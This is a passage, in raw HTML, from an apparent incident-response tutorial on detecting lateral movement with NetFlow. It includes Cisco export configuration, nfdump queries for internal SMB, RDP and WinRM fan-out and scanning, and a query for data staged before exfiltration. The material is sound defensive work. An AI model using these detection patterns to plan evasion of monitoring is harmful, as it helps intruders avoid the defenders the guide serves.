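On the constructed sample this flags 10.10.5.42 for touching four hosts on SMB, lists the three SYN-only probes separately from the completed sessions, and reports the chain 10.10.5.42 to 10.10.5.13 (SMB), to 10.10.6.77 (RDP), and from there to the print server and to 10.10.6.80 (WinRM). The walk deliberately over-approximates: a server that was merely read from is listed alongside hosts that were actually pivoted through, which is why each hop still needs its authentication event.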
Combined with DHCP leases (which host held the IP) and authentication logs (which account was used), this is sufficient to reconstruct lateral movement.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"42-enabling-netflow-on-common-platforms\">4.2 Enabling NetFlow on Common Platforms<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#42-enabling-netflow-on-common-platforms\" class=\"hash-link\" aria-label=\"Direct link to 4.2 Enabling NetFlow on Common Platforms\" title=\"Direct link to 4.2 Enabling NetFlow on Common Platforms\" translate=\"no\">​</a></h3>\n<p>If NetFlow is not already configured, enabling it mid-incident gives you coverage from that moment forward; it recovers nothing that happened before. Check two things before trusting the export. First, whether the platform exports every flow or only a sample: sampled export, the default on some high-speed switch platforms, is fine for capacity planning but misses the short single-connection flows lateral movement produces. Second, where you enable it: ingress and egress on every interface exports each transit flow twice, so collect ingress on every interface, or both directions at a single choke point, but not both everywhere.</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Cisco IOS: enable NetFlow on internal switch interfaces</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ip flow-export destination 10.10.1.100 9995    ! SIEM / flow collector IP and port</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ip flow-export version 9</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ip flow-export source GigabitEthernet0/0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">interface GigabitEthernet0/1                   ! Repeat for each internal-facing interface</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"> ip flow ingress                               ! Ingress on every interface records each flow once; do not add egress everywhere</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">! 
Verify:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">show ip flow export</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">show ip cache flow</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Cisco NX-OS (datacenter switches):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">feature netflow</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow record SECURITY-RECORD</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match ipv4 source address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match ipv4 destination address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match transport source-port</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match transport destination-port</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  match ip protocol</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  collect counter bytes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  collect counter packets</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  
collect transport tcp flags</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  collect timestamp sys-uptime first</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  collect timestamp sys-uptime last</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow exporter SIEM-EXPORT</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  destination 10.10.1.100</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  transport udp 9995</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  version 9</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">flow monitor SECURITY-MONITOR</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  record SECURITY-RECORD</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  exporter SIEM-EXPORT</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  cache timeout active 60</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">interface Ethernet1/1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">  ip flow monitor SECURITY-MONITOR input</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  ip flow monitor SECURITY-MONITOR output</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"43-netflow-queries-for-lateral-movement-detection\">4.3 NetFlow Queries for Lateral Movement Detection<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#43-netflow-queries-for-lateral-movement-detection\" class=\"hash-link\" aria-label=\"Direct link to 4.3 NetFlow Queries for Lateral Movement Detection\" title=\"Direct link to 4.3 NetFlow Queries for Lateral Movement Detection\" translate=\"no\">​</a></h3>\n<p>Most enterprises store NetFlow in a collector (SolarWinds NTA, Elastic with Logstash, Splunk stream, open-source ntopng/nfdump). The following queries work with nfdump (open-source command-line NetFlow analyzer):</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># nfdump is installed on most Linux-based flow collectors</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># NetFlow files typically stored in: /var/cache/nfdump/ or /opt/nfdump/data/</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 1: Find all connections FROM a known compromised host ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Replace 10.10.5.42 with the source IP you're investigating</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-t</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"2025-11-15 00:00:00-2025-11-15 23:59:59\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %te %sa %da %dp %pr %byt %pkt %flg\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"src ip 10.10.5.42 and not dst ip 10.10.5.42\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-k4</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Sort by destination IP to group lateral targets</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 2: Detect internal port scanning ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># High number of unique destinations on the same port = scanning</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 
29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%sa %da %dp %pr %flg\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"src net 10.10.0.0/16 and dst net 10.10.0.0/16 and \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">    (dst port 445 or dst port 135 or dst port 3389 or dst port 5985)\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'{print $1\" \"$3}'</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">  </span><span class=\"token comment\" 
style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Source IP + Destination Port</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">uniq</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-c</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-rn</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">head</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-30</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Output: count src_ip dst_port</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># High counts on port 445 from single source = SMB scanning = BloodHound or lateral prep</span><span class=\"token plain\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 3: Find SMB connections (port 445) between workstations ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Workstation-to-workstation SMB is almost never legitimate in modern environments</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Adjust subnet ranges for your network</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %sa %da %dp %byt %flg\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span 
class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"dst port 445 and src net 10.10.0.0/24 and dst net 10.10.0.0/24\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">grep</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-v</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"10.10.0.10\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Exclude file server if one exists in that subnet</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 4: Detect RDP lateral movement ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" 
style=\"color:hsl(26, 100%, 29%)\">-N</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-q</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %te %sa %da %byt\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"dst port 3389 and src net 10.10.0.0/16 and dst net 10.10.0.0/16\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'{ # -N keeps %byt a raw number (default output scales to \"1.2 M\"); -q drops nfdump header/summary lines</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">           # %ts and %te each print as \"date time\" (two awk fields), so %sa=$5, %da=$6, %byt=$7</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">           bytes=$7; src=$5; dst=$6</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">           # one line per flow (bytes deliberately left out) so uniq -c counts sessions per src/dst pair</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">           if (bytes &gt; 0) print src \" -&gt; \" dst }'</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token 
function\" style=\"color:hsl(256, 54%, 50%)\">uniq</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-c</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-rn</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 5: WinRM lateral movement (port 5985) ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># PowerShell remoting: rarely legitimate between workstations (repeat for 5986 if WinRM over HTTPS is enabled)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %sa %da %byt\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"dst port 5985 and src net 10.10.0.0/16\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 6: Data staging: large internal transfers ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Before exfiltration, attackers stage data on a single host</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Look for unusually large transfers TO a single internal host (sum of %byt per destination)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-N</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-q</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%sa %da %byt\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"src net 10.10.0.0/16 and dst net 10.10.0.0/16\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'{ bytes[$2] += $3 }   # -N: raw byte counts (without it %byt is scaled to \"1.2 M\" and this sum is garbage); -q: no header/summary lines</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">         END { for (dst in bytes) print bytes[dst], dst }'</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-rn</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">head</span><span class=\"token plain\"> </span><span class=\"token 
parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-20</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'{gb=$1/1073741824; printf \"%-15s received %.2f GB\\n\", $2, gb}'</span><br></span></code></pre></div></div>\n<p><strong>Splunk SPL equivalent for organizations storing NetFlow in Splunk.</strong> <code>tstats</code> only reads indexed fields or an accelerated data model, so this assumes NetFlow is normalized into the CIM <code>Network_Traffic</code> model; against a raw <code>index=netflow</code> with search-time field extractions, swap <code>tstats</code> for <code>stats</code>. The final <code>where</code> keeps sources that reached more than five hosts on a single admin port within a day: scanning or fan-out from one foothold.</p>\n<div class=\"language-spl codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-spl codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| tstats count, sum(All_Traffic.bytes) as total_bytes, dc(All_Traffic.dest) as unique_dests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    FROM datamodel=Network_Traffic</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    WHERE earliest=-24h 